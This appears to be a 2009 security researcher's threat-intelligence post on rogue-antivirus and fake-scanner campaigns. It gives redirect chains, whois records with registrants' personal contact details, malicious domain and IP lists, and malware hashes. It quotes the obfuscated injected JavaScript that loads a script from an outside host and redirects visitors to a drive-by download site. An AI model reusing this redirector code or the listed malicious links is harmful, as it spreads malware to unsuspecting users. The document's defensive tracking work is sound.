hxxp://browsersecurityinfo.com
Redirects to
hxxp://ieprotectionlist.com/2/
Redirects to
hxxp://bennysaintscathedral.com/buy.php?nh=1&id=
Redirects to
hxxp://secure.buysecuritysoftwareonline.com/buy.php?nh=1&id=
Whois entry for browsersecurityinfo.com 83.133.123.113
Name: Gupta C Deepak
Address: 580 Booth
City: Edmonton
Province/state: AB
Country: CA
Postal Code: 787843
Whois entry for ieprotectionlist.com 83.133.123.109
Name: Van M Jane
Address: Rod. 5C 41 – Km. 4,8
City: Santa Catarina
Province/state: Santa Catarina
Country: BR
Postal Code: 88122
Whois entry for bennysaintscathedral.com 83.133.123.113
Name: Gayao M Mel
Address: 16-18 Kingsley Close
City: Melbourne
Province/state: Melbourne
Country: RU
Postal Code: 31781
Whois entry for buysecuritysoftwareonline.com 83.133.123.109
Name: Rauf K Abdur
Address: 79-E, Al-Rehman Chamber
City: Islamabad
Province/state: Islamabad
Country: PK
Postal Code: 53241
This website lists quite a few rogue security programs for sale and will direct the user to a payment page to purchase the program. You can see from the screenshots below that they try to make the pages look legit, but to a trained eye, this scan will be spotted immediately.
Whois entry for programstoremovespyware.com 94.76.212.238
Name: Godbout B Martin
Address: 2345 Yonge St, Suite 900
City: Toronto
Province/state: Ontario
Country: CA
Postal Code: 42577
Whois entry for adware-removal-solution.com 89.248.168.46
PrivacyProtect.org
Domain Admin (contact@privacyprotect.org)
P.O. Box 97
Note – All Postal Mails Rejected, visit Privacyprotect.org
Moergestel
null,5066 ZH
NL
Tel. +45.36946676
Whois entry for onlinesoftwarebilling.com 78.46.216.236
Dmitriy Blydov (dmitriyblydov@gmail.com)
yl. Syhodolnaya 169/105
Simferopol
Other,95000
UA
Tel. +380.638550739
Whois entry for advanedprospywarescanner.com 69.4.230.205 78.46.251.41 83.133.126.155
Privat person
Mikhail Peshkov xors678@freebbmail.com
+74952783440 fax: +74952783440
ul. Rozanova 28-51
Moskva Moskovskay oblast 126105
ru
Setup-8d5_02022.exe
Result: 3/41 (7.32%)
MD5: 02daf3cadf61788710833c6c8b8988f9
VirusTotal
ThreatExpert Analysis
hxxp://advanedprospywarescanner.com/download/
There is a blackhat seo campaign that is redirecting users to fake scanning websites to infect users. Each of these domains has many pages filled with keywords to get high rankings on search pages. Once clicked, the user is redirected to the drive-by download site of the day. You can click on each domain name to view the whois information. Here is a list of some of the domains as well as how it works.
<script type=”text/javascript” src=”/counter?i=x-Di3AgjVhR8ak4on4gk1b2YXOLV8tKk9vfMw_qaRu8alxLqUphKSiBSqzUuyL1vtJUnVRoV
Cp_qCODoee2QvAwsxetjrz1uKFNY2brg”></script>
The following javascript is then loaded…
var t3dbj5es5;if (typeof(encodeURIComponent) == ‘function’) t3dbj5es5 = encodeURIComponent;else if (typeof(escape) == ‘function’) t3dbj5es5 = escape;else t3dbj5es5 = function (text) { return text; };document.write(‘<script src=”http://xozkyaf.com/stat?s=54dpw11f64Bj9qRA;r=’ + (document.referrer ? t3dbj5es5(document.referrer) : ”) + ‘” type=”text/javascript”></script>’);
The contents of the new page is below.
document.location.href=’http://spacefunk.cn/go.php?id=2012&key=b6a0fad62&p=1′;
Redirects to
hxxp://spacefunk.cn/go.php?id=2012&key=b6a0fad62&p=1
Redirects to
Fake scanning page of the day as selected by malware distributers.
ufumtrwz.com 208.73.210.26
rmeged.com 208.87.149.250
stqbcfkjp.com 69.64.147.209
vhwdhjfig.com 69.64.147.210
pazjbw.com 69.64.147.210
rklktu.com 69.64.147.211
nbzqkp.com 69.64.147.212
wqtlto.com 69.64.147.212
klqltr.com 69.64.147.212
obirrd.com 69.64.147.212
qylzioqty.com 69.64.147.213
brohpql.com 69.64.147.214
atoonoyxm.com 69.64.147.215
ilmtvne.com 69.64.147.215
udtlgrzm.com 69.64.147.216
tnkpghmt.com 69.64.147.217
lpstjr.com 69.64.147.217
auvwbkdbe.com 69.64.147.217
colixfpf.com 69.64.155.120
qtltmzq.com 69.64.155.120
tgshpj.com 69.64.155.121
mkutvrah.com 69.64.155.121
nzadvyul.com 69.64.155.121
dvgbuqyg.com 69.64.155.121
nsqaidn.com 69.64.155.122
sambmq.com 69.64.155.122
sgkoqblfp.com 69.64.155.122
gxprzo.com 69.64.155.123
ujqqccmvd.com 69.64.155.124
dhmhcze.com 69.64.155.124
xarhwsvf.com 69.64.155.125
fitvahmz.com 69.64.155.126
vqtxnqmre.com 69.64.155.127
buzstyltd.com 69.64.155.127
UPDATED: 7/5/09
tvciucde.com 174.129.244.106 174.129.241.185
jmguhkxaj.com 194.110.162.82
nhroiv.com 194.110.162.83
gyadqcuoc.com 194.110.162.85
igvutelu.com 194.110.162.86
nqcngszq.com 194.110.162.86
birkkane.com 194.110.162.86
ouvthweg.com 194.110.162.89
vwsevihm.com 194.110.162.94
gakvgp.com 194.110.162.95
onnrdm.com 194.110.162.227
hxxp://74.86.144.178/url/go.php?sid=15&q=
Redirect to
hxxp://avyciso.cn/?wm=70126 &q=
Whois entry for avyciso.cn 64.20.38.172
Domain Status: clientTransferProhibited
Registrant Organization: null
Administrative Email: dfgsegzhfs@yahoo.com
Sponsoring Registrar: 广东时代互è”科技有é™å…¬å¸
Name Server:ns1.pubilcnameserver7.com
Name Server:ns2.pubilcnameserver7.com
Registration Date: 2008-12-30 16:31
Expiration Date: 2009-12-30 16:31
This has the same payload as in my previous post here.
http://74.86.144.178/url/go.php?sid=15&q=Liquid+Foam+Urethane+For+Race+Cars
Redirects to
hxxp://avomec.cn/?wm=70126%20&q=Liquid+Foam+Urethane+For+Race+Cars
Whois entry for avomec.cn 195.95.151.174
Domain Status: clientTransferProhibited
Registrant Organization: null
Administrative Email: dfgsegzhfs@yahoo.com
Sponsoring Registrar: 广东时代互è”科技有é™å…¬å¸
Name Server:ns1.pubilcnameserver7.com
Name Server:ns2.pubilcnameserver7.com
Registration Date: 2008-12-30 15:40
Expiration Date: 2009-12-30 15:40
installer_70126.exe
Result: 20/41 (48.79%)
MD5: a85fc3c3122d9dfb7a7ced965559d999
VirusTotal
ThreatExpert Analysis
hxxp://avomec.cn/
